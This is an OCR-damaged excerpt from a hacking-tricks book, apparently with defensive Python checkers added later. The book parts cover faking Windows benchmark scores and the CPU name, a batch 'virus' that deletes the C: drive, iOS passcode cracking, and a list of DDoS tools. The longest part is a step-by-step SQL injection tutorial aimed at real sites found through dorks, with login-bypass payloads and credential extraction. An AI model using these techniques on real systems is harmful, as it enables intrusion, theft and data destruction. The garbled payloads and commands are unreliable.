<Dx9SubScore>3.8</Dx9SubScore>
<Dx10SubScore>5.2</Dx10SubScore>
<GamingScore>5.2</GamingScore>
<StdDefPlaybackScore>TRUE</StdDefPlaybackScore>
<HighDefPlaybackScore>TRUE</HighDefPlaybackScore>
<DiskScore>5.7</DiskScore>
<LimitsApplied><MemoryScore><LimitApplied Friendly="Physical memory available to the OS is less than 4.0GB-64MB on a 64-bit OS : limit mem score to 5.9" Relation="LT">4227858432</LimitApplied></MemoryScore></LimitsApplied></WinSPR>
<Metrics><CPUMetrics><CompressionMetric units="MB/s">191.95522</CompressionMetric>
<EncryptionMetric units="MB/s">95.28615</EncryptionMetric>
<CPUCompression2Metric units="MB/s">461.74589</CPUCompression2Metric><Encryption2Metri


In the Notepad window you don’t need to go too far down to hunt for anything; simply change the values in the upper area as you like. The values are written between tags, such as


<MemoryScore>5.9</MemoryScore>


Change the values between the tags and save the file. The next time you open the Windows Experience Index, the values will be changed.


[Screenshot: the Windows Experience Index window showing the edited subscores.]


OFF THE ROAD TIP: For more fun we suggest everyone keep their scores realistic (not exactly 7.9).


To revert the changes you can re-run the assessment.
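Because the displayed scores come from an editable file, anyone relying on them (a buyer, an asset auditor) can look for careless edits. The check below is an added example, not part of the original book: it tests the rules this chapter states (scores between 1.0 and 7.9, base score equal to the lowest subscore) and the limit recorded in the file's own LimitApplied entry. Both XML samples are constructed from the values shown above, and the function name is hypothetical.

```python
import re
import xml.etree.ElementTree as ET

# The five subscores shown in the Windows Experience Index window.
SUBSCORES = ("CpuScore", "MemoryScore", "GraphicsScore", "GamingScore", "DiskScore")
SCORE_MIN, SCORE_MAX = 1.0, 7.9   # Windows 7 scale, as stated in this chapter
_LIMIT = re.compile(r"limit \w+ score to (\d+(?:\.\d+)?)")

# Constructed samples, trimmed to the <WinSPR> section discussed above.
_TEMPLATE = """<WinSAT><WinSPR>
<SystemScore>{base}</SystemScore><MemoryScore>{mem}</MemoryScore>
<CpuScore>{cpu}</CpuScore><GraphicsScore>{gfx}</GraphicsScore>
<GamingScore>{game}</GamingScore><DiskScore>{disk}</DiskScore>
<LimitsApplied><MemoryScore><LimitApplied
 Friendly="Physical memory available to the OS is less than 4.0GB-64MB on a 64-bit OS : limit mem score to 5.9"
 Relation="LT">4227858432</LimitApplied></MemoryScore></LimitsApplied>
</WinSPR></WinSAT>"""
ORIGINAL_XML = _TEMPLATE.format(base="4.4", mem="5.9", cpu="6.7",
                                gfx="4.4", game="5.2", disk="5.7")
EDITED_XML = _TEMPLATE.format(base="7.9", mem="7.2", cpu="7.6",
                              gfx="7.7", game="7.2", disk="7.5")


def check_winsat(xml_data):
    """Return a list of inconsistencies found in a WinSAT assessment file.

    Accepts str or bytes. The real files are UTF-16, so read them in binary
    mode and pass the bytes; the parser then honours the declared encoding.
    """
    winspr = ET.fromstring(xml_data).find("WinSPR")
    if winspr is None:
        return ["no <WinSPR> section"]

    scores = {}
    for tag in ("SystemScore",) + SUBSCORES:
        text = winspr.findtext(tag)       # direct children only
        try:
            scores[tag] = float(text)
        except (TypeError, ValueError):
            return ["<%s> is missing or not a number" % tag]

    findings = []
    for tag, value in scores.items():
        if not SCORE_MIN <= value <= SCORE_MAX:
            findings.append("%s=%s is outside %s-%s"
                            % (tag, value, SCORE_MIN, SCORE_MAX))

    lowest = min(scores[t] for t in SUBSCORES)
    if abs(scores["SystemScore"] - lowest) > 0.05:
        findings.append("SystemScore=%s but lowest subscore is %s"
                        % (scores["SystemScore"], lowest))

    # A recorded limit ("limit mem score to 5.9") caps the named subscore.
    limits = winspr.find("LimitsApplied")
    for capped in (limits if limits is not None else []):
        for entry in capped.findall("LimitApplied"):
            match = _LIMIT.search(entry.get("Friendly", ""))
            if (match and capped.tag in scores
                    and scores[capped.tag] > float(match.group(1)) + 0.05):
                findings.append("%s=%s exceeds the recorded limit of %s"
                                % (capped.tag, scores[capped.tag], match.group(1)))
    return findings


if __name__ == "__main__":
    for name, sample in (("original", ORIGINAL_XML), ("edited", EDITED_XML)):
        print(name, "->", check_winsat(sample) or "consistent")
```

An edit that keeps every value consistent passes this check; re-running the assessment, which rewrites the file from fresh measurements, is the authoritative test.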


THE HIDDEN 
DRIVES 


HACK TO HIDE 
LOCAL DRIVES 


In this article we are going to learn about hiding things. Generally, you hide the particular file that you want to keep personal, which is the most common way these days, and it can easily be exposed even by a middle school child.


Here we are going to learn how to hide whole specified drives (local disks), which keeps your data safe from the children in your family. You can easily keep your data safe, whether it is your girlfriend’s pic or blah...blah...blah...!


Let’s learn how to hide the specified drives step by step:


To hide the drives you have to edit the group policies of your computer.

To edit group policies, go to the “Run” option, type “gpedit.msc” and click OK.

Or

You can search in your search box for GROUP POLICY.


The Group Policy Editor will open.


In the left part of the window you will see a “USER CONFIGURATION” option. Under the user configuration option there are three options:

1.) Software settings
2.) Windows settings
3.) Administrative templates


Single-click the administrative templates option. Some options appear in the right part of the window. Open the “All Settings” option.


When you open the “All Settings” option, a long list of options is displayed.

Click on the “Settings” option to arrange them alphabetically. If they are already arranged, you can skip this step.


Now press the “H” key of your keyboard a few times to find the “Hide these specified drives in My Computer” option.


Double-click the “Hide these specified drives in My Computer” option.

A window will open.


[Screenshot: the “Hide these specified drives in My Computer” policy dialog with “Restrict A, B, C and D drives only” selected. Its help text notes that the setting only removes the drive icons and that users can still gain access to drive contents by using other methods.]


Select “Enabled” and choose the drives you want to hide from the options given in the lower left part of the window.

After applying the settings, click OK and you will see the drives hidden according to your choice.

I have selected to hide only the A, B, C and D drives, so the E: drive is not hidden in the screenshot given below.


In the above given screenshot only the “E:” drive is shown to the user.

If you want to access the hidden drives, click on the address bar of the My Computer window as marked in the above screenshot, type “D:” or “C:” and press the ENTER key on your keyboard to open the respective drive.


EMPTY HDD 


FORMAT HARD 
DISK WITH 
NOTEPAD 


In this article we are going to learn how to completely delete the C: drive of your computer without a formatting compact disc. Do it at your own risk, because it will destroy the Windows installation on your system, and for this I am not responsible.


FOLLOW THE BELOW STEPS TO FORMAT YOUR C: DRIVE:

Open Notepad and type the following given code

CODE: 
@echo off del C^ *.* \y 




Save it with the extension “.bat”, such as “virus.bat”.


Double-click the saved file to run this virus. A Command Prompt window will open, where it will be deleting your drive.

Note: “I have not tried this virus yet, and also please don’t try on your personal computers. If you have ever tried it, please give me the reviews.”


LET’S HAVE 
SOME FUN 


FUNNY VIRUS TO 
SHOCK YOUR 
FRIENDS 


Hello guys, I think after reading the above chapters it’s now time to have some fun. In this article we are going to learn how to give your friend a shock for a minute.


Basically, here we are going to create a funny virus which will not actually harm your friend’s computer but will shock him/her for a minute.


So let’s create that virus following the same steps we used to create some viruses in previous chapters.


So follow the steps:
Open Notepad and type the following code:


CODES:

@echo off
msg * your computer is attacked by a virus.
msg * click ok to format.
msg * all your data has been deleted.


Save the document with the extension “.bat”.

For example, you can save the virus by the name “funny virus.bat”.


Now your work is to execute the virus.

Just double-click the virus and it will show you a message that


“your computer is attacked by a virus”.


Now whether you click “OK” or close the above message box, it will again show you a message: “click ok to format”.

And I am sure that you are not going to click OK.


But again, it does not matter whether you click OK or close the box, though I am sure that you will close the box.

Again it will show you a message that “all your data has been deleted”.

And for a moment your friend’s heartbeat is going to be at its peak.


So this is a funny way to shock your friends without actually harming them.


DO YOU HAVE
i7?


HOW TO CHANGE 
YOUR PROCESSOR 
NAME 


The trick we are going to learn here is the most interesting trick, and I am sure that it will increase your prestige among your friends, because these days it’s a big deal among your group of friends whether you have an i3, i5 or i7 processor.

So let’s learn how to change your PC from any Core processor to i7.


For that you have to follow these steps:


First of all, go to the “Run” option, type “regedit” and click OK to open the registry editor of your computer.

The registry editing window will open.


Open “HKEY_LOCAL_MACHINE” as highlighted in the figure.


Then open the “HARDWARE” option present under it.


Then open the “DESCRIPTION” option and then the “System” option. Also open the “CentralProcessor” option under the System option.


Then single-click the “0” folder present under “CentralProcessor”.

You will then see that a lot of options appear in the right part of the regedit window. These are called STRINGS.

Search for “ProcessorNameString” among those strings.


Open ProcessorNameString by double-clicking it. A dialogue box will open.

In the “Value data” text box is written what your computer’s processor actually is.


I am using “Pentium(R) Dual-Core CPU T4500 @ 2.30GHz”, as written in the value data.

Now delete that text and write your own text in its place.

For example, you can write “Intel(R) Core i7 CPU T9500 @ 2.30GHz” and click the “OK” option.


Now close the registry editor and let’s check whether it is working. To check it, you have to look at the properties of your computer.

Right-click the My Computer icon and click the “Properties” option, which is the last option of the dialogue box.


The system properties of your computer are shown.


Yuppie! As you can see, the processor name is as expected.

Now your processor is turned into i7.


And now you can say with pride that YOU HAVE A CORE i7 PROCESSOR.


GOOGLE 


HOW TO MAKE
YOUR GOOGLE
SEARCHES
EFFECTIVE


In this article we are going to learn how to make our Google searches effective. When we have to find anything on Google, we open the Google website and start searching. For example, if you want to download a book, you write something like “fifty shades of grey for free”. You will then get a huge number of results, like 753286543567 results in 0.43 seconds, which makes it difficult to find the exact working download link of that book.


You can take some very simple steps to reduce your Google search results. Let’s assume we have to download the same book as mentioned above.

If you write it in the following way, it will reduce your Google search results and make it simple to find the exact download link. Write in this way in the Google search box:

You have to write your search in double quotes, like: “fifty shades of grey.pdf”

Note: don’t forget to add the extension “.pdf”.


Second method: using “GOOGLE HACKS”. You can also use an application named “Google Hacks”. It is easily available on the net and you can find and download it easily through a Google search.


This application also helps you a lot in performing effective searches.


iOS 
PASSWORD 
CRACKING 


IOS PASSWORD 
CRACKING 


These days people generally use a 4-digit PIN to secure their phone. A mobile device gets lost or stolen, and all the person recovering it has to do is try some basic number combinations such as 1234, 1212, or 0000, and soon the device will be unlocked.


Let’s see how to crack your iOS password:

1. For the first step you have to plug your iPhone into your computer and put it into device firmware upgrade mode, i.e. DFU mode:


To enter DFU mode, simply 
power the device off, hold 
down the Home button 
(bottom center) and sleep 
button (upper corner) at the 
same time for 10 seconds, 
and continue holding down 
the Home button for another 
10 seconds. The mobile 
device screen goes blank. 


2. After putting your phone into DFU mode, you need to load the iOS Forensic Toolkit. For this, insert your USB license dongle into your computer and run Toolkit.cmd.


3. After that, load the iOS Forensic Toolkit ramdisk onto the mobile device by selecting option 2, LOAD RAMDISK. Loading the RAMDISK code allows your computer to communicate with the mobile device and run the tools which are needed for cracking the password (among other things).


4. Now select the iOS device type/model that is connected to your computer, as shown in the figure:


I don’t have an iPhone 6 with me now, so I have selected option 14 because I have an iPhone 4 with GSM.


[Screenshot: the Elcomsoft iOS Forensic Toolkit device selection menu, listing iPhone, iPod and iPad models.]


After that you see the toolkit connecting to the device and confirming a successful load, as shown in the figure:


You will also see the Elcomsoft logo in the middle of your mobile device’s screen. I think it looks pretty:


[Screenshot: toolkit output while the ramdisk is loaded onto the device in DFU mode, ending with a prompt to confirm that the device shows the Elcomsoft logo.]


6. Now if you want to crack the device’s password/PIN, simply select option 6, GET PASSCODE, on the main menu:


iOS Forensic Toolkit will prompt you to save the passcode to a file. You can simply press Enter to accept the default of passcode.txt. The cracking process will commence and, with any luck, the passcode will be found and displayed, as shown in the figure:


[Screenshot: iOS Passcode Recovery output. The tool reports a probable simple passcode (4 digits), checks common PINs at an average speed of 3.6 p/s, and prints “Passcode found: 1212”.]


So, having no password for phones and tablets is bad, and a 4-digit PIN such as this is not a much better choice.


So be aware of the attacks! Get up, users, get up: it’s time to be secured.

You can also use iOS Forensic Toolkit to copy files and even crack the keychains to uncover the password that protects the device’s backups in iTunes (option 5, GET KEYS).


PREVENTION:
To prevent being hacked, you can refer to the chapter “PASSWORD CREATING POLICIES”.


HIDE YOUR 
RECYCLE BIN 


HACK TO HIDE 
THE RECYCLE BIN 


Sometimes when you modify the Windows GUI or install a theme for Windows, you find that the Recycle Bin icon remains unmodified and destroys the beauty of your modification.


So in this article we are going to learn how to delete the RECYCLE BIN by hacking the registry.


To delete the Recycle Bin you need to open the registry editor of your computer.

I think that after reading the above sections you are familiar with the “registry editor”.

So go to the registry editor and follow the given path.


HKEY LOCAL MACHINE 


HKEY LOCAL MACHINE 
00AA00 2F954E! 


When you finally open the last path, you will see that the default string of the Recycle Bin is defined.

Now DELETE that string and restart your computer. You will find that the Recycle Bin is deleted.

I am attaching a screenshot for your ease.


After finishing all the steps, don’t forget to restart your computer.

It will work only after the restart.


HOW BOTNET 
DDoS ATTACK 
WORKS... 




DDoS Attack? 


DDoS stands for “Distributed Denial of Service.” A DDoS attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet. In contrast to a Denial of Service (DoS) attack, in which one computer and one internet connection are used to flood a targeted resource with packets, a DDoS attack uses many computers and many internet connections. DDoS attacks are loosely divided into three different types.

The first, Application Layer DDoS Attacks, include Slowloris, zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities, and more. Comprised of seemingly legitimate and innocent requests, these attacks aim to crash the web server, and their magnitude is measured in requests per second.

The second kind of DDoS attack, Protocol DDoS Attacks, includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This sort of attack consumes actual server resources, or those of intermediate equipment such as firewalls and load balancers, and is measured in packets per second.

The third kind of DDoS attack is usually considered the most dangerous. Volume-based DDoS Attacks include UDP floods, ICMP floods, and other spoofed-packet floods. The volume-based attack’s goal is to saturate the bandwidth of the attacked website, and its magnitude is measured in bits per second.




Botnet? 


Sometimes referred to as a “Bunch of Zombies,” a botnet is a group of Internet-connected computers, each of which has been maliciously taken over, usually with the help of malware like Trojan horses. Usually without the knowledge of the computers’ rightful owners, these machines are remotely controlled by an external source via standard network protocols, and are often used for malicious purposes, most commonly for DDoS attacks.


Botnet Tools 


The originator of a botnet is often referred to as a “bot herder” or “bot master.” This individual controls the botnet remotely, usually through an IRC server or a channel on a public IRC server, referred to as the command and control (C&C) server. To communicate with the C&C server, the bot master uses various hidden channels, including apparently innocuous tools like Twitter or IM. More advanced bots automatically seek out more resources to exploit, joining more systems to the botnet in a process referred to as “scrumping.”

Botnet servers may continually communicate and work with other botnet servers, creating entire communities of botnets with individual or multiple bot masters. This means that any given botnet DDoS attack may have multiple origins, or be controlled by multiple people, sometimes operating in coordination and sometimes operating singly.

Botnets are available for rent or lease from various sources, and the use of botnets is auctioned and traded among attackers. Actual marketplaces have sprung up: platforms that enable trading in large numbers of malware-infected PCs, which can be rented and used in botnet DDoS or other attacks. These platforms provide botnet DDoS attack perpetrators with a complete and richly featured toolkit, and a distribution network as well. Even for non-technical users, botnet DDoS attacking can be a viable and cost-effective option to “take out” a competitor’s website. Within the cybercrime ecosystem, botnet DDoS attacks are a mainstream commodity, with prices dropping and effectiveness and sophistication growing. Some of the most common tools for initiating a botnet DDoS attack are easily downloaded from multiple online sources, and include:


SlowLoris 


Especially dangerous to hosts 
running Apache, dhttpd, 
tomcat and GoAhead 
WebServer, Slowloris may be 
a highlytargeted attack, 
enabling one internet server 
to require down another 
server, while not touching 
different services or ports on 


the target network. 
Tor’s Hammer 


Is a slow post dos testing tool 
written in Python. It also can 
be run through the Tor 
network to be anonymized. 
There are several tools for 
testing server readiness to 
resist Botnet DDoS attacks. 


Qslowloris 
Uses Qt libraries to execute 


the ways utilized by 
Slowloris, providing a 
graphical interface that 
creates the program highly 
simple to use. 

Apache Killer 


Utilizes an exploit in the Apache OS first discovered by a Google security engineer. Apache Killer pings a server and tells the server to break up whatever file is transferred into a huge number of little chunks, using the "range" variable. When the server tries to comply with this request, it runs out of memory, or encounters other errors, and crashes.


PyLoris 

A scriptable tool for testing a service's level of vulnerability to a specific category of Denial of Service (DoS) attack.


DDoSim 


Can be used in a laboratory environment to simulate a DDoS attack, and helps measure the capacity of a given server to handle application-specific DDoS attacks, by simulating multiple zombie hosts with random IP addresses that create TCP connections.
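The Apache Killer entry above turns on a single request header, so it is also a place where a server-side filter can act. The following Python sketch is an added example, not code from the book or from Apache: it parses a Range header, counts the requested ranges, and rejects requests that ask for too many or for overlapping ones. The function names, the limit of 5 ranges and the sample headers are assumptions made for illustration.

```python
import re

MAX_RANGES = 5  # assumed policy limit; tune to what legitimate clients send
_RANGE_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_byte_ranges(header_value):
    """Parse 'bytes=0-99,200-' into [(0, 99), (200, None)].

    None marks an omitted bound. Raises ValueError on anything malformed.
    """
    unit, sep, spec = header_value.strip().partition("=")
    if not sep or unit.strip().lower() != "bytes":
        raise ValueError("unsupported or missing range unit")
    ranges = []
    for part in spec.split(","):
        part = part.strip()
        if not part:
            continue  # empty list elements are tolerated
        match = _RANGE_SPEC.match(part)
        if not match or not (match.group(1) or match.group(2)):
            raise ValueError("malformed range spec: %r" % part)
        start = int(match.group(1)) if match.group(1) else None
        end = int(match.group(2)) if match.group(2) else None
        if start is not None and end is not None and end < start:
            raise ValueError("range ends before it starts: %r" % part)
        ranges.append((start, end))
    if not ranges:
        raise ValueError("no ranges given")
    return ranges


def has_overlap(ranges):
    """True if two ranges that have an explicit start cover the same byte."""
    spans = sorted((s, float("inf") if e is None else e)
                   for s, e in ranges if s is not None)
    return any(nxt[0] <= cur[1] for cur, nxt in zip(spans, spans[1:]))


def range_header_verdict(header_value, max_ranges=MAX_RANGES):
    """Classify a Range header as 'allow', 'ignore-header' or 'reject'.

    'ignore-header' means: serve the full body as if no Range was sent.
    'reject' means: refuse the request before any chunking work is done.
    """
    try:
        ranges = parse_byte_ranges(header_value)
    except ValueError:
        return "ignore-header"
    if len(ranges) > max_ranges or has_overlap(ranges):
        return "reject"
    return "allow"


# Constructed sample headers, not captured traffic.
MANY_RANGES = "bytes=" + ",".join("%d-%d" % (i * 10, i * 10 + 1) for i in range(200))
SAMPLES = ["bytes=0-499", "bytes=0-99,200-299", "bytes=-500",
           "bytes=0-100,50-150", MANY_RANGES, "items=0-5", "bytes=abc"]

if __name__ == "__main__":
    for header in SAMPLES:
        print(range_header_verdict(header), header[:40])
```

The count check runs before any response body is assembled, which is the point: the memory cost described above comes from honouring the request, not from receiving it.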


Botnet DDoS Attacks 


Botnet DDoS attacks are quickly becoming the most prevalent type of DDoS threat, growing rapidly within the past year in both number and volume, according to recent market research. The trend is towards shorter attack duration but larger packet-per-second attack volume, and the overall number of attacks reported has grown markedly as well. The typical attack bandwidth observed throughout this period of 2010-2012 was 5.2 Gbps, which is 148% above the previous quarter. Another survey of DDoS attacks found that more than 40% of respondents experienced attacks that exceeded 1 Gbit per second in bandwidth in 2011, and 13 were targeted by at least one attack that exceeded 10 Gbps. From a motivational perspective, newer analysis found that ideologically driven DDoS attacks are on the increase, supplanting financial motivation as the most frequent incentive for such attacks.


WEBSITE 
HACKING 




Now take your time and be serious and free before starting this article, because it is a very wide topic and one of the most interesting among all of the above chapters. In this chapter we will discuss how to hack a vulnerable site using SQL injection.


What is SQL Injection? 


SQL injection is one of the most popular web application hacking methods. Using a SQL injection attack, an unauthorized person can access the database of the website and extract data from it.


What can a hacker do with a SQL injection attack?


* Bypassing logins

* Accessing secret data

* Modifying contents of the website

* Shutting down the MySQL server


So, here we start with bypassing login, i.e. authentication bypass:


In this type of SQL injection, we have generally found the admin login page, and after that we try to open the admin's control panel account by bypassing the authentication.

If you have the admin login 
page of any website then you 
can paste the following codes 
(with quotes) to bypass the 


authentication of the website 
....generally PHP websites 
are vulnerable to this 
injection: 


You can find these types of 
sites simply by Google 
searches. You have to type 
like this in the Google search 
bar: 


www.thesitename.com/adminl 
Or /admin.php? Or Wp- 
login.php? Etc. 


After finding the login page you have to paste the following codes in both the userID and password fields of the admin page until it is bypassed. If not, we will try the next SQL injection, i.e. union based, blind based, error based etc.


Codes to be used as both 
userID and password at the 
admin login page of 
vulnerable website for 


bypassing authentication are 
as follow: 


1'1] ° or °x’="x © or 
0=0 —” or 020 — or 0=0 
—‘ or 0=0 # ог 020 # 
or 0=0 # * or ‘х’=хХ ” or 
E din х“) or (*x’="x 

*orl-l-"or 1=1— or 
1=1— * or a-a- ” or 
"a" —"a 5) or ('a'-'a *) or 
(“а”=”а hi" or "*a"—"a hi" 
or 1=1 - h?’ or 121 — 
‘or’ 1=1' 


If the authentication bypass does not work, then try the following techniques carefully and step by step:

UNION BASED SQLi:

Finding Vulnerable Website:


To find a SQL Injection 
vulnerable site, you can use 
Google search by searching 
for certain keywords. That 
keyword often called as 
“GOOGLE DORK”. 


Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=


Now you have to Copy one of 
the above keyword and 
Google it. Here, we will get a 
lot of search results with 
which we have to visit the 
websites one by one for 
finding the vulnerability. 


For example:
site:www.anyselectedsite.com inurl:index.php?id=

Step 1: Finding the Vulnerability:


Now let us check the vulnerability of the target website. To check the vulnerability, add a single quote (') at the end of the URL and press enter.


For eg: 


http://www.anyselectedsite.coi 


id=2' 

If the page remains in same 
page or showing that page not 
found, then it is not 
vulnerable. 

If you got an error message 
just like this, then it means 
that the site is vulnerable. 


You have an error in your 
SQL syntax; the manual that 
corresponds to your MySQL 
server version for the right 
syntax to use near '\" at line 1 


Step 2: Finding the Number of Columns in the Database:

Great, we have found that the website is vulnerable to SQLi attack.

Our next step is to find the number of columns present in the target database.

For that, replace the single quote (') with an "order by n" statement.

Change n from 1, 2, 3, 4, 5, 6, ... n until you get an error like "unknown column".


For eg:
http://www.anyselectedsite.co: id=2 order by 1
http://www.anyselectedsite.co: id=2 order by 2
http://www.anyselectedsite.co: id=2 order by 3
http://www.anyselectedsite.co: id=2 order by 4

If you get the error while trying the "n"th number, then the number of columns is "n-1".

I mean:
http://www.anyselectedsite.co: id=2 order by 1 (no error shown)
http://www.anyselectedsite.co: id=2 order by 2 (no error shown)
http://www.anyselectedsite.co: id=2 order by 3 (no error shown)
http://www.anyselectedsite.co: id=2 order by 4 (no error shown)
http://www.anyselectedsite.co: id=2 order by 5 (no error shown)
http://www.anyselectedsite.co: id=2 order by 6 (no error shown)
http://www.anyselectedsite.co: id=2 order by 7 (no error shown)
http://www.anyselectedsite.co: id=2 order by 8 (error shown)


So now n=8, the number of columns is n-1, i.e., 7.


In case, if the above method 
fails to work for you, then try 
to add the "--" at the end of 
the statement. 

For eg:
http://www.anyselectedsite.co: id=2 order by 1--

Step 3: Find the Vulnerable Columns:


We have successfully found the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns sequence".


Change the id value to negative (I mean id=-2). Replace the columns sequence with the numbers from 1 to n-1 (number of columns) separated with commas (,).


For eg:


If the number of columns is 7, then the query is as follows:
http://www.anyselectedsite.co: id=-2 union select 1,2,3,4,5,6,7--


If you have applied the above method and it is not working, then try this:
http://www.anyselectedsite.co: id=-2 and 1=2 union select 1,2,3,4,5,6,7--


Once you execute the query, it will display the vulnerable column.


Bingo, columns '3' and '7' are found to be vulnerable. Let us take the first vulnerable column, '3'. We can inject our query in this column.

Step 4: Finding version, database, user


Replace the 3 in the query with "version()".

For eg:
http://www.anyselectedsite.co: id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

Now it will display the version as 5.0.2 or 4.3, something like this. Replace version() with database() and user() to find the database and user respectively.

For eg:
http://www.anyselectedsite.co: id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.anyselectedsite.co: id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working, 
then try this: 
http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 
1,2,unhex(hex(@@version)),4 


Step 5: Finding the Table Name


This step applies if the database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind SQL injection attack). Let us find the table name of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".


For eg:
http://www.anyselectedsite.co: id=-2 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--


Now it will display the list of table names. Find the table name which is related to the admin or user.


ry_comments, gallery gro 


Let us choose the "admin " 
table. 

Step 6: Finding the Column Name

Now replace "group_concat(table_name)" with "group_concat(column_name)".

Replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".

We have to convert the table name to a MySQL CHAR() string.

Install the HackBar addon 
from: 
https://addons.mozilla.org/en- 
US/firefox/addon/3899/ 


Once you installed the add- 
on, you can see a toolbar that 
will look like the following 
one. If you are not able to see 
the Hackbar, then press F9. 


Select sql->Mysql- 
>MysqlChar() in the 
Hackbar. 


It will ask you to enter string 


that you want to convert to 
MySQLCHAR(). We want to 
convert the table name to 
MySQLChar . In our case the 
table name is 'admin'. 




Now you can see the CHAR(numbers separated with commas) in the Hack toolbar.


Copy and paste the code at 
the end of the url instead of 
the "mysqlchar" 


For eg:
http://www.anyselectedsite.co: id=-2 and 1=2 union select 1,2,group_concat(column_nan from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

The above query will display the list of columns.

For example: 


admin,password,admin id,adr 
admin name,admin pass,adn 
га, admin,admin usern 
me,username,password..etc.. 


Now replace group_concat(column_name) with group_concat(columnnamel,0


Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".

For eg:
http://www.anyselectedsite.co: id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x from admin--


If the above query displays 
the 'column is not found' 
error, then try another column 
name from the list. 


If we are lucky, then it will 
display the data stored in the 
database depending on your 
column name. For example, 
username and password 
column will display the login 
credentials stored in the 
database. 


Step 7: Finding the Admin 
Panel: 


Just try with url like: 
http://www.anyselectedsite.co: 
http://www.anyselectedsite.co: 
http://www.anyselectedsite.co: 
http://www.anyselectedsite.co: 
etc. 


If you are lucky, you will find 
the admin page using above 
urls or you can use some kind 
of admin finder tools like 


Havij admin finder, sql 
poison for SQL attacking 
(tool). 


And once you found the 
admin panel you have to do 
further works on your own 
risk. 
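Seen from the server side, the probing sequence in the steps above (a trailing quote, "order by" counted upwards, then "union select" and reads from information_schema) leaves a distinctive trail in the web access log. The following Python sketch is an added example, not part of the original book: it scans access-log lines and flags source addresses that show that trail. The log lines are constructed, and the rule names and thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in common log format (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:55:10 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 310
203.0.113.9 - - [10/Oct/2023:13:55:14 +0000] "GET /index.php?id=2+order+by+1 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:55:16 +0000] "GET /index.php?id=2+order+by+2 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:55:18 +0000] "GET /index.php?id=2+order+by+3 HTTP/1.1" 500 310
203.0.113.9 - - [10/Oct/2023:13:55:30 +0000] "GET /index.php?id=-2+union+select+1,version() HTTP/1.1" 200 4801
203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=-2+union+select+1,group_concat(table_name)+from+information_schema.tables HTTP/1.1" 200 4950
198.51.100.23 - - [10/Oct/2023:13:56:02 +0000] "GET /search.php?q=how+to+order+by+mail HTTP/1.1" 200 2210
198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /article.php?id=15 HTTP/1.1" 200 7300
"""

LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')

# Each rule is matched against the URL-decoded value of every query parameter.
RULES = [
    ("quote-probe", re.compile(r"^-?\d+'$")),                 # numeric id with a trailing quote
    ("order-by-enum", re.compile(r"\border\s+by\s+(\d+)", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema-read", re.compile(r"\binformation_schema\b", re.I)),
    ("db-fingerprint", re.compile(r"@@version|\b(?:version|database|user)\s*\(\s*\)", re.I)),
]


def scan(log_text):
    """Return {source_ip: {"rules": [...], "order_by": [...]}} for lines that hit a rule."""
    findings = defaultdict(lambda: {"rules": set(), "order_by": set()})
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue
        ip, target, _status = match.groups()
        query = urlsplit(target).query
        for _name, value in parse_qsl(query, keep_blank_values=True):
            for rule, pattern in RULES:
                hit = pattern.search(value)
                if not hit:
                    continue
                findings[ip]["rules"].add(rule)
                if rule == "order-by-enum":
                    findings[ip]["order_by"].add(int(hit.group(1)))
    return {ip: {"rules": sorted(f["rules"]), "order_by": sorted(f["order_by"])}
            for ip, f in findings.items()}


def longest_run(numbers):
    """Length of the longest run of consecutive integers in a sorted list."""
    best = run = 0
    prev = None
    for n in numbers:
        run = run + 1 if prev is not None and n == prev + 1 else 1
        best = max(best, run)
        prev = n
    return best


def flagged_sources(findings, min_rules=2, min_run=3):
    """Sources that hit several distinct rules or walked 'order by' upwards."""
    return sorted(ip for ip, f in findings.items()
                  if len(f["rules"]) >= min_rules
                  or longest_run(f["order_by"]) >= min_run)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for ip in flagged_sources(results):
        print(ip, results[ip])
```

The search request containing the words "order by mail" is not flagged, because the enumeration rule requires a column number and the verdict needs either several distinct rules or a counted run from one source.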

PREVENTION: 


This article is focused on providing clear, simple, actionable guidance for preventing SQL Injection flaws in your applications. SQL Injection attacks are unfortunately very common, and this is due to two factors:


1.) The significant prevalence 
of SQL Injection 
vulnerabilities, and 

2.) The attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).


It’s somewhat shameful that 
there are so many successful 
SQL Injection attacks 
occurring, because it is 
EXTREMELY simple to 
avoid SQL Injection 
vulnerabilities in your code. 


SQL Injection flaws are introduced when software developers create dynamic database queries that include user supplied input. Avoiding SQL injection flaws is simple. Developers need to either: a) stop writing dynamic queries; and/or b) prevent user supplied input which contains malicious SQL from affecting the logic of the executed query.


This article provides a set of 
simple techniques for 
preventing SQL Injection 
